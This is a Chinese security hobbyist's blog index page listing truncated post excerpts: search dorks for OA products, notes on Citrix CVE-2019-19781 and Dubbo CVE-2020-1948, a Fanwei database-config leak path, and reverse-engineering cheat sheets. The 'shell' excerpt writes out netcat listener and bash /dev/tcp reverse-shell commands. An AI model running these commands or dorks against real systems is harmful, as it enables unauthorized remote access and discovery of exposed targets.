会员
众包
新闻
博问
闪存
赞助商
HarmonyOS
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
7hang.
网络安全爱好者,blog is just for notes.
博客园
首页
新随笔
联系
订阅
管理
上一页
1
2
3
4
5
6
···
21
下一页
2020年12月3日
baidu
摘要: site:domain
阅读全文
posted @ 2020-12-03 16:04 7hang
阅读(81)
评论(0)
推荐(0)
2020年10月13日
字典
摘要: 根据姓名生成字典 https://github.com/fupinglee/JavaTools/tree/master/Tools 开源项目 https://github.com/TheKingOfDuck/fuzzDictshttps://github.com/rootphantomer/Blas
阅读全文
posted @ 2020-10-13 10:09 7hang
阅读(86)
评论(0)
推荐(0)
2020年9月15日
Citrix
摘要: CVE-2019-19781 影响产品 Citrix ADCCitrix Gateway 影响版本 Citrix ADC and Citrix Gateway version 13.0 all supported builds Citrix ADC and NetScaler Gateway ver
阅读全文
posted @ 2020-09-15 16:26 7hang
阅读(240)
评论(0)
推荐(0)
2020年9月13日
泛微产品-泛微云桥
摘要: fofa:title="泛微"
阅读全文
posted @ 2020-09-13 14:52 7hang
阅读(331)
评论(0)
推荐(0)
2020年9月9日
金和OA
摘要: 金和OA --北京金和网络股份有限公司 GoogleDork: "inurl:JHSoft.web.login" | 金和软件 @2015 Jinher Software | inurl:sub/viewDetail.jsp?newsid=BingDork: JHSoft.Web.login | P
阅读全文
posted @ 2020-09-09 14:22 7hang
阅读(1504)
评论(0)
推荐(0)
2020年8月7日
安全研究 - Java - Apache Dubbo
摘要: Dubbo Provider默认反序列漏洞(CVE-2020-1948) Dubbo Provider有4种方式:XML配置,properties方式配置,API调用方式配置,注解方式配置 前置条件: NettyServer(默认端口:12345) 端口对外开放 补丁 https://github.
阅读全文
posted @ 2020-08-07 12:19 7hang
阅读(223)
评论(0)
推荐(0)
2020年7月21日
shell
摘要: Bash 攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i >& /dev/tcp/[host]/Port 0>&1/dev/tcp/[host]/Port;cat <&5 | while read line; do $line 2>&5 >&5; done /b
阅读全文
posted @ 2020-07-21 10:09 7hang
阅读(521)
评论(0)
推荐(0)
2020年6月24日
安全研究 - 泛微OA
摘要: 接口 /login/Login.jsp?logintype=1 #前台登录 2019年泛微e-cology OA数据库配置信息泄漏包括不限于8.0、9.0版本/mobile/dbconfigreader.jsp 2019年泛微e-cology OA系统V8、V9版本SQL注入(暂未发现公开poc)
阅读全文
posted @ 2020-06-24 01:24 7hang
阅读(3041)
评论(0)
推荐(0)
2020年6月23日
Reverse-工具篇-OD快捷键整理
摘要: Ctrl+A 分析当前模块的代码段 Ctrl+G 输入十六位地址,定位到此地址 Alt+l 记录 Alt+e 可执行模块 Alt+m 内存 Alt+c cpu(反汇编视图) Ctrl+p 补丁 Alt+k 调用堆栈 Alt+b 断点 Alt+f5 设置窗口总在最前 Alt+o 调试选项 Alt+F3
阅读全文
posted @ 2020-06-23 10:12 7hang
阅读(360)
评论(0)
推荐(0)
2020年6月18日
逆向 - 汇编指令整理
摘要: 跳转指令 (1)无条件跳转 JMP (2)根据 CX、ECX 寄存器的值跳转 JCXZ:CX 为 0 则跳转) JECXZ:ECX 为 0 则跳转) (3)根据 EFLAGS标志位跳转 JE: 等于则跳转 JNE: 不等于则跳转 JZ:为 0 则跳转 JNZ:不为 0 则跳转 JS:为负则跳转 JN
阅读全文
posted @ 2020-06-18 09:52 7hang
阅读(642)
评论(0)
推荐(0)
上一页
1
2
3
4
5
6
···
21
下一页
公告